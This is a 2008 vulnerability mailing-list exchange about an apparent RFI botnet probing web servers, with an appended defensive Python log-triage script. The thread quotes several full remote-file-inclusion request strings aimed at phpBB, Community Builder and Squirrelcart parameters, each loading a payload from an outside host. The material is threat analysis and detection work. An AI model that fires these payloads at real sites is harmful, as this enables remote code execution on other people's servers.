[VIM] RFI BotNet and phpBB 0-day?

str0ke str0ke at milw0rm.com
Thu Mar 20 13:35:28 UTC 2008


How goes it Brian,

If you're bored I have a few rfi's for you to go through :)

# wc -l todays-rfi-bots.txt
   44737 todays-rfi-bots.txt

The file will show the number of unique entries that have hit milw0rm in
the past 24 hours requesting http inclusions.  People forget to remove
milw0rm from their rfi scans.

/str0ke

security curmudgeon wrote:
>
> For a while I've noticed a ton of RFI requests made to attrition.org,
> the frequency and patterns suggest it's a large botnet possibly. I
> haven't had time to really dig into the logs and learn much about it.
> Tonight I saw one request come across and got curious how many of
> these requests were published vulnerabilities versus potential 0-day.
> Many requests don't have enough information to easily determine the
> software (e.g. /dir/index.php?id=http://), but this may:
>
> /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
>
>
> I don't see reference to "page_tail.php" in CVE or OSVDB. The
> directory structure suggests it is either in Claroline or phpBB though.
>
> http://www.claroline.net/download/stable.html
>
> Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file
> above.
>
> http://www.phpbb.com/downloads/
>
> Version 2.0.23 ("legacy") has "page_tail.php" in it.
>
> Version 3.0.0 (phpBB3) has no file by that name.
>
> -- 
>
> So, does anyone want to see if it is truly vulnerable? If so, we know
> it's phpBB 2.0.23 (and maybe prior), we know the file name and
> variable, and we know it is actively being exploited in the wild and
> discovered as a result of it.
>
> Brian
>
>
>
> p.s. While writing this, a full example of one that would be a tad
> harder to track down, but given the "com_comprofiler" and
> "mosConfig_absolute_path", shouldn't be that difficult:
> /index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f
>
>
> p.p.s. And an example of an older disclosed vulnerability being used:
> /squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
>
> (CVE-2006-2483 / OSVDB 25523)
>
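As an added defender-side example (not part of this thread or of either poster's tooling), a small Python script that does the log triage the thread describes: it picks out requests whose query parameter carries a remote URL with the trailing `??` seen in the quoted samples, then counts unique scanning sources and the script/parameter pairs being probed. The log lines are constructed and the hosts are placeholders; treating the `??` suffix as the RFI marker is a heuristic taken from the examples above, not a rule from the thread.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format log lines modelled on the request
# patterns quoted in the thread; addresses and hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Mar/2008:13:01:02 +0000] "GET /claroline/phpbb/page_tail.php?includePath=http://host.example/id2.txt%3f%3f HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [20/Mar/2008:13:01:03 +0000] "GET /squirrelcart/cart_content.php?cart_isp_root=http://host.example/id2.txt%3f%3f HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [20/Mar/2008:13:02:10 +0000] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&mosConfig_absolute_path=http://other.example/id.txt%3f%3f HTTP/1.1" 404 512 "-" "Mozilla/4.0"
192.0.2.77 - - [20/Mar/2008:13:03:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.78 - - [20/Mar/2008:13:04:00 +0000] "GET /redirect.php?url=http://example.org/page HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client address, request line target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def rfi_params(target):
    """Return (script_path, [(param, remote_url)]) for query values that look
    like remote-include payloads: an absolute URL ending in the '??' tail
    (sent as %3f%3f) that the scans in the thread all carry."""
    parts = urlsplit(target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already percent-decodes, so %3f%3f arrives here as '??'.
        if value.lower().startswith(("http://", "https://", "ftp://")) and value.endswith("??"):
            hits.append((name, value))
    return parts.path, hits


def summarize(log_text):
    """Count RFI-style requests, unique source addresses and probed
    (script, parameter) pairs, the way the thread's 'wc -l' tally does."""
    sources, targets, total = set(), Counter(), 0
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, hits = rfi_params(m.group("target"))
        for param, _url in hits:
            total += 1
            sources.add(m.group("ip"))
            targets[(path, param)] += 1
    return {"requests": total, "unique_sources": len(sources), "targets": targets}


if __name__ == "__main__":
    result = summarize(SAMPLE_LOG)
    print(result["requests"], "RFI requests from", result["unique_sources"], "sources")
    for (path, param), n in result["targets"].most_common():
        print(f"{n:5d}  {path}?{param}=")
```

Unknown (script, parameter) pairs in the output are the candidates for the CVE/OSVDB lookup Brian describes; known ones map to already-disclosed issues.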

